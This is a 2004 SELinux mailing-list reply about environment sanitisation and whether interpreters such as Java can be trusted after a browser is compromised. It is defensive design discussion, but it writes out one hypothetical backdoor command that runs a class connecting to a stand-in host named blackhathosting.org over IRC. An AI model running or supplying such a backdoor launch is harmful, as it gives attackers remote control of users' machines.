SELinux and the Desktop

Steve Coleman 23e9t5t02 at sneakemail.com
Thu Oct 14 17:56:57 UTC 2004 

Colin Walters walters-at-redhat.com |fedora| wrote:

>The major threat here is environment variables, right? 
>
That one is a minor issue in my book, but certainly worth trying to 
enforce in some way.

>I wonder what all
>would break if we by changed e.g. bash and python to by default clean
>the environment before executing the script if it was executed from a
>domain transition 
>
Could be a lot. If you sanitize classpath or PERL5LIB a lot could break, 
but it you don't you might not be running what you think you are, which 
leads back to what I was inquiring about.

So just to clarify, whats the difference between a user running a script 
file that does exec "java ./MyClass.class" and a stack overrun causing a 
browser with a smashed stack to save a MyBackdoor.class to the local 
file system and execing "java ./MyBackdoor.class -irc 
blackhathosting.org" ?

In both cases its the same user, and in both cases its the same java VM 
binary. The java binary is likely the only process that knows enought to 
enforce anything here based on when, what, and where things are run by 
the user. The browser may try to limit what permissions are passed to 
the exec call but with a smashed stack overrun can you trust it to? Not 
me, at least not yet. This looks to me like the java VM needs to be 
hacked with the SELinux API in order to have any confidence in it, but 
in some ways that duplicates the java security managers role in life. 
Perhaps we just need a specialized Java security manager, perhaps much 
more. Dunno. But its a common issue with desktop actions and shells, as 
well as Perl, Python, Ruby, just pick your poison...

I guess what I was looking for was a phylosophy for how to handle this 
nebulous issue. The more likely answer is each has its own issues and 
must be dealt with seperatly in its own special way and must be changed 
to deal with SE. I am hoping for a better option as there is much in SE 
I don't know yet and I do want to understand it in great detail some way 
down the road.

Thanks.

More information about the selinux mailing list